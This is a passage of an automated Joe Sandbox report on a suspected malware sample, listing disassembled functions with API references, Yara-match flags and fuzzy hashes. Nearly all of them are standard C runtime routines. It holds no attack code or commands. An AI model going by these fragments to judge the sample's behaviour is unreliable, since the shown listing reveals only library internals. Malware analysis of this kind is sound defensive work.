                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 00404DEF
                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 00404E0D
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                            • String ID:
                                                            • API String ID: 2243866535-0
                                                            • Opcode ID: 4c2bec8a94d2dfe1f31f48f90f5228b8d61b4d632ca62fad144830f22e520e62
                                                            • Instruction ID: 4ef84c01712664b50a137fe66981e95a650a2e1b5a714d2619638ac2ebdb4e30
                                                            • Opcode Fuzzy Hash: 4c2bec8a94d2dfe1f31f48f90f5228b8d61b4d632ca62fad144830f22e520e62
                                                            • Instruction Fuzzy Hash: 9411A372D001189BCB15EBA5C841AEEB7B4AF54715F14017FE901BB2D2DB3C9A0587DC
                                                            Function 00A54FDE Relevance: 9.1, APIs: 6, Instructions: 53COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 00A54FEF
                                                            • int.LIBCPMT ref: 00A55006
                                                              • Part of subcall function 00A5BFE8: std::_Lockit::_Lockit.LIBCPMT ref: 00A5BFF9
                                                              • Part of subcall function 00A5BFE8: std::_Lockit::~_Lockit.LIBCPMT ref: 00A5C013
                                                            • std::locale::_Getfacet.LIBCPMT ref: 00A5500F
                                                            • std::_Facet_Register.LIBCPMT ref: 00A55040
                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 00A55056
                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 00A55074
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4555591206.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_a50000_GK059kPZ5B.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                            • String ID:
                                                            • API String ID: 2243866535-0
                                                            • Opcode ID: 4c2bec8a94d2dfe1f31f48f90f5228b8d61b4d632ca62fad144830f22e520e62
                                                            • Instruction ID: 646d85c69fb7a7dd951a2ef34ceaf271f55c30a3227e661a73a2c0e09eb3e57d
                                                            • Opcode Fuzzy Hash: 4c2bec8a94d2dfe1f31f48f90f5228b8d61b4d632ca62fad144830f22e520e62
                                                            • Instruction Fuzzy Hash: D411AC32C006289FCB25EBA4DA16AEE7770BF10712F244119F8156B2D2DB749A088BD0
                                                            Function 0040C1AE Relevance: 9.1, APIs: 6, Instructions: 51COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 0040C1BF
                                                            • int.LIBCPMT ref: 0040C1D6
                                                              • Part of subcall function 0040BD81: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD92
                                                              • Part of subcall function 0040BD81: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BDAC
                                                            • std::locale::_Getfacet.LIBCPMT ref: 0040C1DF
                                                            • std::_Facet_Register.LIBCPMT ref: 0040C210
                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 0040C226
                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 0040C244
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                            • String ID:
                                                            • API String ID: 2243866535-0
                                                            • Opcode ID: 4e144f3e275808a570db40f1fcdaa1681d1240728c494bcfa96d4ea4c14bb240
                                                            • Instruction ID: 1719d9dd00d927231adb6862ad7e4c37149c3208904b64558a42dcf46f1f70c2
                                                            • Opcode Fuzzy Hash: 4e144f3e275808a570db40f1fcdaa1681d1240728c494bcfa96d4ea4c14bb240
                                                            • Instruction Fuzzy Hash: 2011A072D00228DBCB14EBA4D891AEDB774AF44314F14057EE401BB2D2DF3C9A0587D9
                                                            Function 004054F7 Relevance: 9.1, APIs: 6, Instructions: 51COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 00405508
                                                            • int.LIBCPMT ref: 0040551F
                                                              • Part of subcall function 0040BD81: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD92
                                                              • Part of subcall function 0040BD81: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BDAC
                                                            • std::locale::_Getfacet.LIBCPMT ref: 00405528
                                                            • std::_Facet_Register.LIBCPMT ref: 00405559
                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 0040556F
                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 0040558D
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                            • String ID:
                                                            • API String ID: 2243866535-0
                                                            • Opcode ID: e4ce11b37ce44f7ba8e9afc7401a0a9b198b24000e5175f43f23aaf661957535
                                                            • Instruction ID: 335d1a0449174c4850433ac7d89b0c6b75dcf3c5386a47d7b2396d3cdec16656
                                                            • Opcode Fuzzy Hash: e4ce11b37ce44f7ba8e9afc7401a0a9b198b24000e5175f43f23aaf661957535
                                                            • Instruction Fuzzy Hash: 5B117072D005289BCB15EBA4D841AEEB774EF44319F54013EE415BB2D2DB389E058B9C
                                                            Function 00405593 Relevance: 9.1, APIs: 6, Instructions: 51COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 004055A4
                                                            • int.LIBCPMT ref: 004055BB
                                                              • Part of subcall function 0040BD81: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD92
                                                              • Part of subcall function 0040BD81: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BDAC
                                                            • std::locale::_Getfacet.LIBCPMT ref: 004055C4
                                                            • std::_Facet_Register.LIBCPMT ref: 004055F5
                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 0040560B
                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 00405629
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                            • String ID:
                                                            • API String ID: 2243866535-0
                                                            • Opcode ID: 512af338323df7cd9b5461e6ba28ebb24eb4a9fd8b3f2c51b537379dd0adb521
                                                            • Instruction ID: 8e1419515e35d36fc68c9e18a3e27bb0650dc63e33415fac19ced33b622727b6
                                                            • Opcode Fuzzy Hash: 512af338323df7cd9b5461e6ba28ebb24eb4a9fd8b3f2c51b537379dd0adb521
                                                            • Instruction Fuzzy Hash: B911AC729006289BCF14EBA0C841AEEB360EF44319F14043FE811BB2D2DB389A058BDC
                                                            Function 00404C39 Relevance: 9.1, APIs: 6, Instructions: 51COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 00404C4A
                                                            • int.LIBCPMT ref: 00404C61
                                                              • Part of subcall function 0040BD81: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD92
                                                              • Part of subcall function 0040BD81: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BDAC
                                                            • std::locale::_Getfacet.LIBCPMT ref: 00404C6A
                                                            • std::_Facet_Register.LIBCPMT ref: 00404C9B
                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 00404CB1
                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 00404CCF
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                            • String ID:
                                                            • API String ID: 2243866535-0
                                                            • Opcode ID: 80a228f69bd2cb3116441d1b51d3088f88c36febe04a249c7f41ad217ba583fd
                                                            • Instruction ID: 7f60e392e4a430ae1f2c93b626e46d5b6b74a1b844d6ec56694562dd50cc071c
                                                            • Opcode Fuzzy Hash: 80a228f69bd2cb3116441d1b51d3088f88c36febe04a249c7f41ad217ba583fd
                                                            • Instruction Fuzzy Hash: 6811A072D001289BCB14EBA0C841AEEB7B0AF84319F11003EE511BB2E2DB3C990487D8
                                                            Function 00A5C415 Relevance: 9.1, APIs: 6, Instructions: 51COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 00A5C426
                                                            • int.LIBCPMT ref: 00A5C43D
                                                              • Part of subcall function 00A5BFE8: std::_Lockit::_Lockit.LIBCPMT ref: 00A5BFF9
                                                              • Part of subcall function 00A5BFE8: std::_Lockit::~_Lockit.LIBCPMT ref: 00A5C013
                                                            • std::locale::_Getfacet.LIBCPMT ref: 00A5C446
                                                            • std::_Facet_Register.LIBCPMT ref: 00A5C477
                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 00A5C48D
                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 00A5C4AB
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4555591206.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_a50000_GK059kPZ5B.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                            • String ID:
                                                            • API String ID: 2243866535-0
                                                            • Opcode ID: 4e144f3e275808a570db40f1fcdaa1681d1240728c494bcfa96d4ea4c14bb240
                                                            • Instruction ID: 213346c2c6bd1b80cc75818c84032f6a0d18188b535ced542eb47a48feb21450
                                                            • Opcode Fuzzy Hash: 4e144f3e275808a570db40f1fcdaa1681d1240728c494bcfa96d4ea4c14bb240
                                                            • Instruction Fuzzy Hash: E511C272800328AFCB15EBA4C955AFD7770BF10322F144519F8257B2D2DB748A48CB90
                                                            Function 00A54EA0 Relevance: 9.1, APIs: 6, Instructions: 51COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 00A54EB1
                                                            • int.LIBCPMT ref: 00A54EC8
                                                              • Part of subcall function 00A5BFE8: std::_Lockit::_Lockit.LIBCPMT ref: 00A5BFF9
                                                              • Part of subcall function 00A5BFE8: std::_Lockit::~_Lockit.LIBCPMT ref: 00A5C013
                                                            • std::locale::_Getfacet.LIBCPMT ref: 00A54ED1
                                                            • std::_Facet_Register.LIBCPMT ref: 00A54F02
                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 00A54F18
                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 00A54F36
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4555591206.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_a50000_GK059kPZ5B.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                            • String ID:
                                                            • API String ID: 2243866535-0
                                                            • Opcode ID: 80a228f69bd2cb3116441d1b51d3088f88c36febe04a249c7f41ad217ba583fd
                                                            • Instruction ID: 51cf8bcfa50fa00b0e2c7953ddc27ef6d91eb113f62c561142b0b47b1535b212
                                                            • Opcode Fuzzy Hash: 80a228f69bd2cb3116441d1b51d3088f88c36febe04a249c7f41ad217ba583fd
                                                            • Instruction Fuzzy Hash: D411CE728002289BCB15EBA4CD46AED7770BF44726F140119FC106B2D2DB748E4CCB90
                                                            Function 00A78957 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 117COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___except_validate_context_record.LIBVCRUNTIME ref: 00A7898A
                                                            • __IsNonwritableInCurrentImage.LIBCMT ref: 00A78A43
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4555591206.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_a50000_GK059kPZ5B.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CurrentImageNonwritable___except_validate_context_record
                                                            • String ID: 11@$@fB$csm
                                                            • API String ID: 3480331319-1464837749
                                                            • Opcode ID: be357bd56004c24e133951e3250c1e3ffc6610d741da1472be978505f667fff6
                                                            • Instruction ID: 3fb4f23533d4ca8c8c1c58bf3a57bd85be978a978c041a770a70359c05f351d9
                                                            • Opcode Fuzzy Hash: be357bd56004c24e133951e3250c1e3ffc6610d741da1472be978505f667fff6
                                                            • Instruction Fuzzy Hash: CF41D630E40209ABCF10DF28CC49AAE7BB5AF44364F14C166E91D5B392DB3ADE11CB91
                                                            Function 0040D410 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID: Xtime_diff_to_millis2_xtime_get
                                                            • String ID: 11@
                                                            • API String ID: 531285432-1785270423
                                                            • Opcode ID: 0e36c963428b9d60b974f18f0769f742c4f51e3c626c870dcc3986d9ed4dafa0
                                                            • Instruction ID: 5ee48cf3c78ecc5b6537ee055918bb6364c51208e2805909369ee9a6debb6cd6
                                                            • Opcode Fuzzy Hash: 0e36c963428b9d60b974f18f0769f742c4f51e3c626c870dcc3986d9ed4dafa0
                                                            • Instruction Fuzzy Hash: E5213075D001099FDF04EFA5DC419BEB7B8AF48718B10406AF901B7291D678AD059B65
                                                            Function 00A5D677 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4555591206.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_a50000_GK059kPZ5B.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Xtime_diff_to_millis2_xtime_get
                                                            • String ID: 11@
                                                            • API String ID: 531285432-1785270423
                                                            • Opcode ID: 100972eb18cca990445868258ca18565aedc37090e71be810c06a2a5d3a0331b
                                                            • Instruction ID: 55323c988e6057b9c729b91707b22411ad9abf4da2fe13ba57d3329a09cc10c1
                                                            • Opcode Fuzzy Hash: 100972eb18cca990445868258ca18565aedc37090e71be810c06a2a5d3a0331b
                                                            • Instruction Fuzzy Hash: 27214F75A0020A9FDF14EFA4DD829BEB7B8FF09712F100069FA01A7261D774AE058B90
                                                            Function 0042370F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 70COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SetEvent.KERNEL32(?,00000000), ref: 00423759
                                                            • Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 00423741
                                                              • Part of subcall function 0041B74C: Concurrency::details::ContextBase::ThrowContextEvent.LIBCONCRT ref: 0041B76D
                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 0042378A
                                                            • Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 004237B3
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID: Context$Event$Base::Concurrency::details::$ThrowTrace$Exception@8
                                                            • String ID: 11@
                                                            • API String ID: 2630251706-1785270423
                                                            • Opcode ID: 458ed3e5417ba220ed4bd1e4a28432a397d2c2fe66a31dff9dce91352e516156
                                                            • Instruction ID: 33ce48ef146ac78a3ef221314cc781bfd8a3c25b4f9a6e194e2960aa52b33145
                                                            • Opcode Fuzzy Hash: 458ed3e5417ba220ed4bd1e4a28432a397d2c2fe66a31dff9dce91352e516156
                                                            • Instruction Fuzzy Hash: 9C110B757002106BCF047F65DC85DAE7765EF84772B10416BFA05D7292CFAC9E41CA98
                                                            Function 0041CE2D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 35threadCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • Concurrency::details::SchedulerProxy::GetCurrentThreadExecutionResource.LIBCMT ref: 0041CE41
                                                            • Concurrency::details::ResourceManager::RemoveExecutionResource.LIBCONCRT ref: 0041CE65
                                                            • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0041CE78
                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 0041CE86
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID: Resource$Concurrency::details::Execution$CurrentException@8Manager::Proxy::RemoveSchedulerThreadThrowstd::invalid_argument::invalid_argument
                                                            • String ID: pScheduler
                                                            • API String ID: 3657713681-923244539
                                                            • Opcode ID: 9390b3195b713983fe10ad4c3c6d405898b6246382bfd66b9966ffe9dd40d037
                                                            • Instruction ID: 46b9ecfe0875f7f86596c353a9bffc422044863c42dab0ab2bac390bf5a45ba1
                                                            • Opcode Fuzzy Hash: 9390b3195b713983fe10ad4c3c6d405898b6246382bfd66b9966ffe9dd40d037
                                                            • Instruction Fuzzy Hash: 8FF0593594070863C324EB15DC828DEB3799E91728360812FE40563182CF3CAE8AC69D
                                                            Function 0041E63D Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 28threadCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • Concurrency::details::FreeThreadProxy::ReturnIdleProxy.LIBCONCRT ref: 0041E65F
                                                            • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0041E672
                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 0041E680
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID: Concurrency::details::Exception@8FreeIdleProxyProxy::ReturnThreadThrowstd::invalid_argument::invalid_argument
                                                            • String ID: 11@$pContext
                                                            • API String ID: 1990795212-1086721755
                                                            • Opcode ID: a1f300e0f29ed94639b3e21e46aa6b462f5911b6182861392c7cf2f18a492d1f
                                                            • Instruction ID: 1f218d0b40ab772f1aed9042d58143e35ca4ab3a9892fa22be9c34d269449320
                                                            • Opcode Fuzzy Hash: a1f300e0f29ed94639b3e21e46aa6b462f5911b6182861392c7cf2f18a492d1f
                                                            • Instruction Fuzzy Hash: 45E06139B0011457CB04FB66DC06C5DB7A8AEC0B14750006FF901A3342DFB8A90585C8
                                                            Function 0042B126 Relevance: 7.7, APIs: 5, Instructions: 222COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 7096e54c8b2da2135de54d2c532f2528a1a3733c17ca5e9eea5bc4f64eff24f9
                                                            • Instruction ID: 7eacffcc392e6897453e427a1bc5d3d4951d53cce7b4b374ddd0667b65be5727
                                                            • Opcode Fuzzy Hash: 7096e54c8b2da2135de54d2c532f2528a1a3733c17ca5e9eea5bc4f64eff24f9
                                                            • Instruction Fuzzy Hash: FF718E31B00266DBCB21CF95E884ABFBB75EF45360FA8426BE81057280D7789D41C7E9
                                                            Function 00A7B38D Relevance: 7.7, APIs: 5, Instructions: 222COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4555591206.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_a50000_GK059kPZ5B.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c6c6193084eda7c089116deee67986cf6f8c182de1deee36b40da2a445f3b6d2
                                                            • Instruction ID: dafeeb617219bb9f7ba39bed81532712fb4a3a6ac0bca253c21da9f62ac96132
                                                            • Opcode Fuzzy Hash: c6c6193084eda7c089116deee67986cf6f8c182de1deee36b40da2a445f3b6d2
                                                            • Instruction Fuzzy Hash: 5C7180B1A20216DBCB218F99CC84BBFBB75EF55710F24C229E41AA7191DB709D41CBB0
                                                            Function 00430A64 Relevance: 7.7, APIs: 5, Instructions: 187COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 004336C7: RtlAllocateHeap.NTDLL(00000000,0040D895,00000000,?,004267BE,00000002,00000000,00000000,00000000,?,0040CD46,0040D895,00000004,00000000,00000000,00000000), ref: 004336F9
                                                            • _free.LIBCMT ref: 00430B6F
                                                            • _free.LIBCMT ref: 00430B86
                                                            • _free.LIBCMT ref: 00430BA5
                                                            • _free.LIBCMT ref: 00430BC0
                                                            • _free.LIBCMT ref: 00430BD7
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID: _free$AllocateHeap
                                                            • String ID:
                                                            • API String ID: 3033488037-0
                                                            • Opcode ID: c373ba6c443c71e4ab428eca93eb82442dc6f2775a0feb0437eab9ebf47d5f4f
                                                            • Instruction ID: b3708cb7fd5f7c05c7b70e76ebc142bc523ed94c66de99b1f2255d1376b2cc69
                                                            • Opcode Fuzzy Hash: c373ba6c443c71e4ab428eca93eb82442dc6f2775a0feb0437eab9ebf47d5f4f
                                                            • Instruction Fuzzy Hash: BD51DF31A00304ABDB21DF6AC851A6BB7F4EF58724F14566EE809DB250E739A901CB48
                                                            Function 00A80CCB Relevance: 7.7, APIs: 5, Instructions: 187COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4555591206.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_a50000_GK059kPZ5B.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: _free$AllocateHeap
                                                            • String ID:
                                                            • API String ID: 3033488037-0
                                                            • Opcode ID: 04cddca887ba2481dccaf07e364353f16ad7a97d03e7f311f8a0717563f20aa1
                                                            • Instruction ID: 6c7787cdb315c236abca36af4a9bc47d9e80c4ca994d9f2744ba681b9aec7471
                                                            • Opcode Fuzzy Hash: 04cddca887ba2481dccaf07e364353f16ad7a97d03e7f311f8a0717563f20aa1
                                                            • Instruction Fuzzy Hash: 5151B272A00604AFDB60EF69D982A6BB7F4FF58720B144A69E909D7250E735ED05CB80
                                                            Function 004314FB Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID: _free
                                                            • String ID:
                                                            • API String ID: 269201875-0
                                                            • Opcode ID: 709da5f20d6e6a4df2ef3b0591b918cf649e9a4efbf4d631092fdebfca928cec
                                                            • Instruction ID: 2269d71fc1307fb615fcd26a16e66de3d258f5a42cea17c2f792775dd2d74ff0
                                                            • Opcode Fuzzy Hash: 709da5f20d6e6a4df2ef3b0591b918cf649e9a4efbf4d631092fdebfca928cec
                                                            • Instruction Fuzzy Hash: E541C432E00204AFCB10DF78C981A5AB7B5EF89714F15456EE516EB391DB35ED02CB84
                                                            Function 00A81762 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4555591206.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_a50000_GK059kPZ5B.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: _free
                                                            • String ID:
                                                            • API String ID: 269201875-0
                                                            • Opcode ID: 709da5f20d6e6a4df2ef3b0591b918cf649e9a4efbf4d631092fdebfca928cec
                                                            • Instruction ID: 7064a26a68620d3643521f36cdf4ff08893b05e77d2039a53cdfb0ffdb8a379f
                                                            • Opcode Fuzzy Hash: 709da5f20d6e6a4df2ef3b0591b918cf649e9a4efbf4d631092fdebfca928cec
                                                            • Instruction Fuzzy Hash: 7441A136A003049FDB14EF78C981A5EB7F9EF85714F154669E515EB391D731AE02CB80
                                                            Function 004368BD Relevance: 7.6, APIs: 5, Instructions: 110COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • MultiByteToWideChar.KERNEL32(?,00000000,23E85006,0042D11A,00000000,00000000,0042D958,?,0042D958,?,00000001,0042D11A,23E85006,00000001,0042D958,0042D958), ref: 0043690A
                                                            • __alloca_probe_16.LIBCMT ref: 00436942
                                                            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00436993
                                                            • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 004369A5
                                                            • __freea.LIBCMT ref: 004369AE
                                                              • Part of subcall function 004336C7: RtlAllocateHeap.NTDLL(00000000,0040D895,00000000,?,004267BE,00000002,00000000,00000000,00000000,?,0040CD46,0040D895,00000004,00000000,00000000,00000000), ref: 004336F9
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                                                            • String ID:
                                                            • API String ID: 313313983-0
                                                            • Opcode ID: 3e8a2e8aab748589cebb1bfb4cc7bc8f0b8dcb51511829ebe5bc338c40e17782
                                                            • Instruction ID: 564015b8663966f91a736df8c1f199cffa5732d11cc50b43fea489f3b547491b
                                                            • Opcode Fuzzy Hash: 3e8a2e8aab748589cebb1bfb4cc7bc8f0b8dcb51511829ebe5bc338c40e17782
                                                            • Instruction Fuzzy Hash: 0A31CE72A0020AAFDF249F65CC41EAF7BA5EF44714F16422AFC04D6290EB39CD54CB98
                                                            Function 0041AEE6 Relevance: 7.6, APIs: 5, Instructions: 88COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _SpinWait.LIBCONCRT ref: 0041AF0B
                                                              • Part of subcall function 00410F41: _SpinWait.LIBCONCRT ref: 00410F59
                                                            • Concurrency::details::ContextBase::ClearAliasTable.LIBCONCRT ref: 0041AF1F
                                                            • Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 0041AF51
                                                            • List.LIBCMT ref: 0041AFD4
                                                            • List.LIBCMT ref: 0041AFE3
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
